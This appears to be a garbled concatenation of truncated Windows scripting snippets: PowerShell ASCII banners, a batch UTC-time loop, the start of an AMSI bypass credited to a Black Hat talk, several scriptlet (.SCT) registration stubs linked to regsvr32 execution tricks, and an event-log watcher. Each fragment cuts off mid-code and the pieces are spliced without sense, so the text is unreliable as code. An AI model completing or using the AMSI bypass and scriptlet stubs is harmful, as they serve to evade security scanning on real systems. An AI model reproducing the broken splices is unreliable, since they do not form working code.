
# Banner text. Each line of the here-string is emitted exactly as written
# (the art contains no `$`, so the expandable @"..."@ form does no substitution).
$art = @"
__________ _________.__ .__ .__ _____ .___ _____ _________
\______ \______ _ __ ___________/ _____/| |__ ____ | | | | _/ ____\___________ | | _____/ ____\____ / _____/ ____ ____
| ___/ _ \ \/ \/ // __ \_ __ \_____ \ | | \_/ __ \| | | | \ __\/ _ \_ __ \ | |/ \ __\/ _ \\_____ \_/ __ \_/ ___\
| | ( <_> ) /\ ___/| | \/ \| Y \ ___/| |_| |__ | | ( <_> ) | \/ | | | \ | ( <_> ) \ ___/\ \___
|____| \____/ \/\_/ \___ >__| /_______ /|___| /\___ >____/____/ |__| \____/|__| |___|___| /__| \____/_______ /\___ >\___ >
\/ \/ \/ \/ \/ \/ \/ \/
"@
# -Fore is only a prefix abbreviation of -ForegroundColor; use the full parameter name.
Write-Host $art -ForegroundColor Cyan
$art = @"
,ggg, ,ggggggggggg, ,ggggggggggggggg
dP""8I I8 dP"""88""""""Y8, 8I dP""""""88"""""""
dP 88 I8 Yb, 88 `8b 8I Yb,_ 88
dP 88 88888888 gg `" 88 ,8P 8I `"" 88
,8' 88 I8 "" 88aaaad8P" 8I 88
d88888888 I8 ,ggggg, ,ggg,,ggg,,ggg, gg ,gggg, 88""""Yb, ,ggg, ,gggg,8I 88 ,ggg, ,gggg,gg ,ggg,,ggg,,ggg,
__ ,8" 88 I8 dP" "Y8ggg,8" "
@echo off
REM Delayed expansion is required for the !var:~...! substring syntax used further down in this script.
SETLOCAL EnableDelayedExpansion
FOR /L %%L IN (0,0,1) DO @(
REM get UTC times modified from: https://stackoverflow.com/questions/9871499/how-to-get-utc-time-with-windows-batch-file
for /f %%a in ('wmic Path Win32_UTCTime get Year^,Month^,Day^,Hour^,Minute^,Second /Format:List ^| findstr "="') do (
set %%a
)
Set Second=0!Second:~0,-1!
Set Second=!Second:~-2!
# source: https://i.blackhat.com/Asia-22/Friday-Materials/AS-22-Korkos-AMSI-and-Bypass.pdf
# author: Maor Korkos (@maorkor)
$APIs = @"
using System;
using System.Runtime.InteropServices;
public class APIs {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
<?XML version="1.0"?>
<scriptlet>
<registration
description="a desc"
progid="aprogid"
version="1.00"
classid="{123A1231-1111-2323-2323-2323FEEDACDC}"
>
<?XML version="1.0"?>
<scriptlet>
</script>
</scriptlet>
<?XML version="1.0"?>
<scriptlet>
<registration
description="a desc"
progid="aprogid"
version="1.00"
classid="{123A1231-1111-2323-2323-2323FEEDACDC}"
>
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
.SCT for testing (++++ @subTee)
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
Tail an event log through PowerShell
## PowerShell Eventing lets you tail an event log:
## http://powershellcookbook.com/recipe/IMyz/respond-to-automatically-generated-events
$watcher = New-Object System.Diagnostics.Eventing.Reader.EventLogWatcher "Microsoft-Windows-PowerShell/Operational"
Register-ObjectEvent $watcher EventRecordWritten -Action {
$event = $eventArgs.EventRecord
if($event.ProcessId -ne $pid)
{
## Save the last event into a variable in the PowerShell session if you want to explore its properties,
## as the eventing actions run in their own runspace
# $GLOBAL:lastEvent = $event